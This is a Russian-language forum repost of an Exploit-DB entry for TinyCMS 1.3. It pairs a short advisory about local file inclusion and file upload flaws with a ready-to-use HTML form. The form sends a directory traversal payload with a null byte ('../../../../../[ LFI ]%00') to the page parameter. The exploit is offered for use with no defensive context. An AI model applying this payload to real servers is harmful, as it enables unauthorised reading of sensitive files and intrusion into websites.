Exploit TinyCMS 1.3 - 'index.php?page' Traversal Local File Inclusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
37341
Проверка EDB
  1. Пройдено
Автор
KEDANS-DZ
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
null
Дата публикации
2012-06-03
TinyCMS 1.3 - 'index.php?page' Traversal Local File Inclusion
Код:
source: https://www.securityfocus.com/bid/53761/info
 
TinyCMS is prone to multiple local file-include vulnerabilities and an arbitrary-file-upload vulnerability.
 
An attacker can exploit these issues to upload arbitrary files onto the web server, execute arbitrary local files within the context of the web server, and obtain sensitive information.
 
TinyCMS 1.3 is vulnerable; other versions may also be affected. 


<form action='http://www.example.com/index.php?page=../../../../../[ LFI ]%00' method='post'>
<input type='submit' value='Get/Include Local File'>
</form>
 
Источник
www.exploit-db.com

Похожие темы